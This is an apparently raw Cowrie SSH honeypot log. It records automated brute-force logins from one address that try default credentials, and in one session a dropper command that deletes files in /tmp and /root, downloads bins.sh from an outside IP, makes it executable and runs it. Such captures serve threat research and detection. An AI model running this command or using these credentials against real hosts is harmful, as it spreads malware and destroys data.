{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.773907Z","src_ip":"87.120.191.13","session":"7cde361b86cc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.775663Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.776251Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.777484Z","src_ip":"87.120.191.13","session":"6d95fd758965"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.777951Z","src_ip":"87.120.191.13","session":"6d95fd758965"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.782001Z","src_ip":"87.120.191.13","session":"142a6c14bf41"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.782441Z","src_ip":"87.120.191.13","session":"142a6c14bf41"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.784561Z","src_ip":"87.120.191.13","session":"9e203e42409a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.785134Z","src_ip":"87.120.191.13","session":"9e203e42409a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.790220Z","src_ip":"87.120.191.13","session":"08890d54e889"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.790763Z","src_ip":"87.120.191.13","session":"08890d54e889"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.792376Z","src_ip":"87.120.191.13","session":"f19c498b1b95"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.792962Z","src_ip":"87.120.191.13","session":"f19c498b1b95"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.794109Z","src_ip":"87.120.191.13","session":"3706b4f0989a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.794646Z","src_ip":"87.120.191.13","session":"3706b4f0989a"}
{"eventid":"cowrie.login.success","username":"root","password":"ubnt","message":"login attempt [root/ubnt] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.853083Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.login.success","username":"root","password":"ftpuser","message":"login attempt [root/ftpuser] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:27.982754Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:28.007901Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.command.input","input":"cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","message":"CMD: cd /tmp;rm -rf /tmp/* || cd /var/run || cd /mnt || cd /root;rm -rf /root/* || cd /; wget http://178.16.54.252/bins.sh; curl -O http://178.16.54.252/bins.sh;/bin/busybox wget http://178.16.54.252/bins.sh; chmod 777 bins.sh;./bins.sh;sh bins.sh; rm bins.sh","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.008689Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.login.failed","username":"student","password":"pi","message":"login attempt [student/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.025171Z","src_ip":"87.120.191.13","session":"6d95fd758965"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pi","message":"login attempt [admin/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.028884Z","src_ip":"87.120.191.13","session":"142a6c14bf41"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"pi","message":"login attempt [ubnt/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.032084Z","src_ip":"87.120.191.13","session":"7cde361b86cc"}
{"eventid":"cowrie.login.failed","username":"noc","password":"pi","message":"login attempt [noc/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.055953Z","src_ip":"87.120.191.13","session":"9e203e42409a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","size":139,"shasum":"ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ad6355c5cb181585b8de0316e58f42672b652135ca9e19db3735bcacea5e3f16 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.067322Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.session.file_download","url":"http://178.16.54.252/bins.sh","outfile":"var/lib/cowrie/downloads/e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","shasum":"e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.068717Z","message":"Downloaded URL (http://178.16.54.252/bins.sh) with SHA-256 e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d to var/lib/cowrie/downloads/e03437d975f80eaf4e308f484cff61aec64c0dbc1b6f591a2b276808b38b1f7d","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.069714Z","src_ip":"87.120.191.13","session":"08890d54e889"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38632,"dst_ip":"1.2.3.4","dst_port":22,"session":"e41c338f3e82","protocol":"ssh","message":"New connection: 87.120.191.13:38632 (1.2.3.4:22) [session: e41c338f3e82]","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.075264Z"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"pi","message":"login attempt [ftpuser/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.086764Z","src_ip":"87.120.191.13","session":"3706b4f0989a"}
{"eventid":"cowrie.login.failed","username":"pi","password":"pi","message":"login attempt [pi/pi] failed","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.096306Z","src_ip":"87.120.191.13","session":"f19c498b1b95"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T01:53:28.167550Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.168251Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.169707Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.170302Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.172436Z","src_ip":"87.120.191.13","session":"4dca916f0cf3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.237775Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.238847Z","src_ip":"87.120.191.13","session":"db2f113c671d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38644,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1f4e4a98e1b","protocol":"ssh","message":"New connection: 87.120.191.13:38644 (1.2.3.4:22) [session: b1f4e4a98e1b]","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.278758Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.323768Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.324423Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.login.success","username":"root","password":"ftpuser","message":"login attempt [root/ftpuser] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.495860Z","src_ip":"87.120.191.13","session":"e41c338f3e82"}
{"eventid":"cowrie.login.success","username":"root","password":"student","message":"login attempt [root/student] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:53:28.629167Z","src_ip":"87.120.191.13","session":"b1f4e4a98e1b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.285966Z","src_ip":"87.120.191.13","session":"6d95fd758965"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38648,"dst_ip":"1.2.3.4","dst_port":22,"session":"1aa9425db2f4","protocol":"ssh","message":"New connection: 87.120.191.13:38648 (1.2.3.4:22) [session: 1aa9425db2f4]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.305223Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.306519Z","src_ip":"87.120.191.13","session":"9e203e42409a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.320075Z","src_ip":"87.120.191.13","session":"08890d54e889"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":38658,"dst_ip":"1.2.3.4","dst_port":22,"session":"d62f8427108f","protocol":"ssh","message":"New connection: 87.120.191.13:38658 (1.2.3.4:22) [session: d62f8427108f]","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.340700Z"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.343245Z","src_ip":"87.120.191.13","session":"142a6c14bf41"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:53:29.367679Z","src_ip":"87.120.191.13","session":"7cde361b86cc"}
